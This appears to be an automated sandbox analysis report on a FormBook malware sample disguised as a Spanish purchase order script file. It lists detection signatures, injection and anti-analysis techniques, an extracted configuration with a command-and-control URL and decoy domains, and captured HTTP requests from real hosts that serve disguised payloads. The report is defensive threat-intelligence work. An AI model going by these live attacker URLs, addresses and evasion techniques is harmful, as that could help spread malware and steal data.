Windows Analysis Report
NUEVA ORDEN DE COMPRA 80107.wsf

Overview

General Information

Sample Name:	NUEVA ORDEN DE COMPRA 80107.wsf
Analysis ID:	635408
MD5:	f9c710eee0ec4b46dfb370e5e2280c36
SHA1:	c5b21cdd87ec4c5f8349747ecab5963b40556081
SHA256:	02cda7e8e87599f480515b611d57653429825d45dbfd2bcee0b9f1ea8e845fc6
Tags:	FormbookwsfXloader
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected FormBook

Malicious sample detected (through community Yara rule)

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Snort IDS alert for network traffic

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Writes to foreign memory regions

Downloads files with wrong headers with respect to MIME Content-Type

Wscript starts Powershell (via cmd or directly)

Suspicious powershell command line found

Performs DNS queries to domains with low reputation

Injects a PE file into a foreign processes

Yara detected Generic Downloader

Queues an APC in another process (thread injection)

Deletes itself after installation

Tries to detect virtualization through RDTSC time measurements

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Stores files to the Windows start menu directory

Contains functionality to call native functions

HTTP GET or POST without a user agent

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Java / VBScript file with very long strings (likely obfuscated code)

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Creates a start menu entry (Start Menu\Programs\Startup)

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Found WSH timer for Javascript or VBS script (likely evasive script)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality for read data from the clipboard

Classification

Signatures

AV Detection

Found malware configuration

Source: 0000000F.00000000.422768755.0000000000400000.00000040.00000400.00020000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.hibikaiteki.com/s4ig/"], "decoy": ["60carrst-th15.com", "suapeleemprimeirolugar.com", "fairble.com", "7890136.com", "toastingthetunnos.com", "znetonline.net", "ginamora.com", "salazarcomunicacion.com", "acesso-livre-mercado.com", "nancykmorrison.store", "amazonwisely.com", "dannymarkphotography.com", "tenlog029.xyz", "quickfinderplus.online", "abdomenpkluwk.xyz", "portraypsdbmv.top", "arst4you.com", "doublehartpress.com", "deadsdradqueer.com", "salvaescalerasarnet.com", "givingisnotagiven.com", "vellegallery.com", "rtva.top", "nexusbalance.com", "createurs-de-bijoux.com", "kellybavis.com", "giaohanggiaretetkiemhcm.com", "cukis-prakerja.xyz", "dbk3.com", "40dgj.xyz", "bikebrewandflights.com", "lovinlufkin.com", "redentor.digital", "rqgmarket.com", "kindofgoodsco.com", "tb25431.icu", "caui.top", "mercedesfbs4.com", "yadook.com", "rab-pas-vervallen.icu", "shref94.com", "chinafireratedglass.com", "driftwoodbeachclub.com", "mentication.com", "schedulekeymail.com", "cameraderie.photography", "promoapp12.com", "modart.xyz", "choicearticleto-readtoday.info", "prostitutkitambovasuck.info", "mgav21.xyz", "idreamtz.com", "keepcharged.online", "gobigmedia.net", "cookinkele.com", "99lottery.info", "atlantidepc.com", "univerdelacreation.com", "thuongmainongnghiep.com", "thulasiabc.com", "sushifactoryamphawa.com", "emprendedor-virtual.com", "3laaaldin.com", "madisonboles.com"]}

Yara detected FormBook

Source: Yara match	File source: 15.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000000.422768755.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.496318132.000000000D70E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.422446596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.932465488.0000000003420000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.516637201.0000000002738000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.932661914.0000000003C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.526166021.0000000000D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.525982132.0000000000B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.932348490.0000000003210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.525904242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.517447397.0000000002738000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.449978783.00000181C4D54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.448761827.00000181C4C37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.477642007.000000000D70E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Antivirus detection for URL or domain

Source: http://www.acesso-livre-mercado.com/s4ig/www.40dgj.xyz	Avira URL Cloud: Label: malware
Source: http://www.acesso-livre-mercado.com/s4ig/	Avira URL Cloud: Label: malware
Source: http://www.shref94.com/s4ig/www.deadsdradqueer.com	Avira URL Cloud: Label: malware
Source: http://www.mentication.com/s4ig/www.prostitutkitambovasuck.info	Avira URL Cloud: Label: malware
Source: http://www.shref94.com/s4ig/	Avira URL Cloud: Label: malware
Source: http://www.prostitutkitambovasuck.info/s4ig/TL	Avira URL Cloud: Label: malware
Source: http://www.caui.top/s4ig/www.giaohanggiaretetkiemhcm.com	Avira URL Cloud: Label: phishing
Source: http://www.createurs-de-bijoux.com/s4ig/	Avira URL Cloud: Label: malware
Source: http://www.prostitutkitambovasuck.info/s4ig/	Avira URL Cloud: Label: malware
Source: www.hibikaiteki.com/s4ig/	Avira URL Cloud: Label: malware
Source: http://20.106.232.4/rumpe/26-05-2022-StartUp.pdf	Avira URL Cloud: Label: malware
Source: http://www.caui.top/s4ig/	Avira URL Cloud: Label: phishing
Source: http://www.hibikaiteki.com/s4ig/	Avira URL Cloud: Label: malware
Source: http://www.hibikaiteki.com/s4ig/www.caui.top	Avira URL Cloud: Label: malware
Source: http://www.createurs-de-bijoux.com/s4ig/www.fairble.com	Avira URL Cloud: Label: malware
Source: http://www.giaohanggiaretetkiemhcm.com/s4ig/www.mentication.com	Avira URL Cloud: Label: malware
Source: http://www.mentication.com/s4ig/	Avira URL Cloud: Label: malware
Source: http://20.106.232.4/dll/26-05-2022-StartUp.pdf	Avira URL Cloud: Label: malware
Source: http://www.giaohanggiaretetkiemhcm.com/s4ig/	Avira URL Cloud: Label: malware
Source: http://20.106.232.4	Avira URL Cloud: Label: malware

Antivirus or Machine Learning detection for unpacked file

Source: 15.2.RegAsm.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 15.0.RegAsm.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 15.0.RegAsm.exe.400000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 15.0.RegAsm.exe.400000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Source:	Binary string: RegAsm.pdb source: explorer.exe, 00000006.00000000.614677532.00000000029E7000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: RegAsm.exe, 0000000F.00000003.425165861.0000000002754000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: WAUgLeAhDG.pdb source: powershell.exe, 0000000C.00000002.436703755.00000181B4EB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.451254825.00000181CD3D0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 0000000F.00000003.425165861.0000000002754000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe
Source:	Binary string: RegAsm.pdb4 source: explorer.exe, 00000006.00000000.614677532.00000000029E7000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: WAUgLeAhDG.pdbH\|^\| P\|_CorDllMainmscoree.dll source: powershell.exe, 0000000C.00000002.436703755.00000181B4EB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.451254825.00000181CD3D0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: ddscfIvqgW.pdb source: powershell.exe, 0000000C.00000002.436356861.00000181B4DB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.441209131.00000181B57D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.451218272.00000181CCFB0000.00000004.08000000.00040000.00000000.sdmp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then pop edi		15_2_00415B28
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 4x nop then pop edi		27_2_03225B28

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 199.34.228.47 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.sushifactoryamphawa.com
Source: C:\Windows\explorer.exe	Network Connect: 54.203.72.218 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 91.195.240.103 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.choicearticleto-readtoday.info
Source: C:\Windows\explorer.exe	Domain query: www.mgav21.xyz
Source: C:\Windows\explorer.exe	Domain query: www.nexusbalance.com
Source: C:\Windows\explorer.exe	Network Connect: 45.128.51.66 80	Jump to behavior

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2025011 ET TROJAN Powershell commands sent B64 2 20.106.232.4:80 -> 192.168.2.6:49769

Downloads files with wrong headers with respect to MIME Content-Type

Source: http	Bad PDF prefix: HTTP/1.1 200 OK Date: Fri, 27 May 2022 19:15:48 GMT Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.28 Last-Modified: Thu, 26 May 2022 14:26:51 GMT ETag: "3aac-5dfeafb144fa1" Accept-Ranges: bytes Content-Length: 15020 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/pdf Data Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 43 34 51 4e 70 41 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 56 41 41 41 43 51 41 41 41 41 47 41 41 41 41 41 41 41 41 72 6b 49 41 41 41 41 67 41 41 41 41 59 41 41 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41 41 42 41 41 41 41 41 41 41 41 41 41 47 41 41 41 41 41 41 41 41 41 41 43 67 41 41 41 41 41 67 41 41 41 41 41 41 41 41 4d 41 59 49 55 41 41 42 41 41 41 42 41 41 41 41 41 41 45 41 41 41 45 41 41 41 41 41 41 41 41 42 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 47 42 43 41 41 42 4c 41 41 41 41 41 47 41 41 41 4d 41 44 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 49 41 41 41 41 77 41 41 41 41 63 51 67 41 41 48 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 49 41 41 41 43 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 43 41 41 41 45 67 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 35 30 5a 58 68 30 41 41 41 41 74 43 49 41 41 41 41 67 41 41 41 41 4a 41 41 41 41 41 49 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 41 41 41 47 41 75 63 6e 4e 79 59 77 41 41 41 4d 41 44 41 41 41 41 59 41 41 41 41 41 51 41 41 41 41 6d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 41 41 41 42 41 4c 6e 4a 6c 62 47 39 6a 41 41 41 4d 41 41 41 41 41 49 41 41 41 41 41 43 41 41 41 41 4b 67 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 51 41 41 41 51 67 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 51 51 67 41 41 41 41 41 41 41 45 67 41 41 41 41 43 41 41 55 41 58 43 51 41 41 41 67 64 41 41 41 44 41 41 41 41 41 41 41 41 41 47 52 42 41 41 43 34 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 34 43 4b 41 45 41 41 41 6f 71 48 67 49 6f 41 67 41 41 43 69 71 6d 63 77 4d 41 41 41 71 41 41 51 41 41 42 48 4d 45 41 41 41 4b 67 41 49 41 41 41 52 7a 42 51 41 41 43 6f 41 44 41 41 41 45 63 77 59 41 41 41 71 41 42 41 41 41 42 43 6f 41 41 43 35 2b 41 51 41 41 42 47 38 48 41 41 41 4b 4b 69 35 2b 41 67 41 41 42 47 3
Source: http	Bad PDF prefix: HTTP/1.1 200 OK Date: Fri, 27 May 2022 19:15:50 GMT Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.28 Last-Modified: Thu, 26 May 2022 14:25:11 GMT ETag: "1a580-5dfeaf520524a" Accept-Ranges: bytes Content-Length: 107904 Content-Type: application/pdf Data Raw: e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91

Performs DNS queries to domains with low reputation

Source: C:\Windows\explorer.exe

DNS query: www.mgav21.xyz

Yara detected Generic Downloader

Source: Yara match	File source: 12.2.powershell.exe.181ccfb0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.powershell.exe.181b4def050.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.powershell.exe.181b586e7e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.451218272.00000181CCFB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.hibikaiteki.com/s4ig/

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /dll/26-05-2022-StartUp.pdf HTTP/1.1Host: 20.106.232.4Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /rumpe/26-05-2022-StartUp.pdf HTTP/1.1Host: 20.106.232.4
Source: global traffic	HTTP traffic detected: GET /tsdfguhijk.txt HTTP/1.1Host: 2.56.57.22Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /s4ig/?CTM8q=6lUH4xyXELQ8-0r&0tx=cD7SGqgsMdn1qG9AyDMlGxGbikkTJ3e+SLNAYG8XHeGes8xhGajuA9PSV6Vq4uulpQsNka3DRA== HTTP/1.1Host: www.nexusbalance.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /s4ig/?0tx=EE1KxreShStuWGRfOzXQivmJYb01nsHN4Y+USZVKUNF8o5M6FFhEbiUBXOrRFrwbnBV3ymr95w==&CTM8q=6lUH4xyXELQ8-0r HTTP/1.1Host: www.choicearticleto-readtoday.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /s4ig/?CTM8q=6lUH4xyXELQ8-0r&0tx=OUASG+zKIyPgsbPq7aByYUb53Y7vFTrhhhVYwgCqKyQGNMMvVk3uDgUSApaDProA7A9idTtJxA== HTTP/1.1Host: www.sushifactoryamphawa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /s4ig/?0tx=dCXC+2ZT0QRaPMB/1bkCzyFCQOsWt/uhEcdMypxrEdi7eXd+jvTokAesL3IOP6QRIKOYlLryUQ==&CTM8q=6lUH4xyXELQ8-0r HTTP/1.1Host: www.mgav21.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /daveCrpted.jpg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: 2.56.57.22Connection: Keep-Alive

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundX-Powered-By: ExpressContent-Type: text/plain; charset=utf-8Content-Length: 9ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"Date: Fri, 27 May 2022 19:18:41 GMTConnection: closeServer: lighttpd/1.4.54Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found

Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22
Source: unknown	TCP traffic detected without corresponding DNS query: 2.56.57.22

Source: powershell.exe, 00000001.00000002.401894286.000001FD1C2BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.441209131.00000181B57D7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://2.5
Source: powershell.exe, 00000001.00000002.401894286.000001FD1C2BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.396098842.000001FD1B781000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.441209131.00000181B57D7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://2.56.57.22
Source: powershell.exe, 00000001.00000002.402117178.000001FD1C2E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://2.56.57.22/daveCrpt
Source: powershell.exe, 00000001.00000002.402117178.000001FD1C2E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://2.56.57.22/daveCrpted
Source: powershell.exe, 00000001.00000002.396098842.000001FD1B781000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.401268481.000001FD1C1F3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://2.56.57.22/daveCrpted.jpg
Source: powershell.exe, 00000001.00000002.396098842.000001FD1B781000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://2.56.57.22/daveCrpted.jpg0y
Source: powershell.exe, 0000000C.00000002.441209131.00000181B57D7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://2.56.57.22/ts
Source: powershell.exe, 0000000C.00000002.436356861.00000181B4DB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.441209131.00000181B57D7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://2.56.57.22/tsdfguhijk.txt
Source: powershell.exe, 0000000C.00000002.436356861.00000181B4DB6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://2.56.57.22x
Source: powershell.exe, 0000000C.00000002.440905719.00000181B57B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.435361690.00000181B4C21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://20.106.232.4
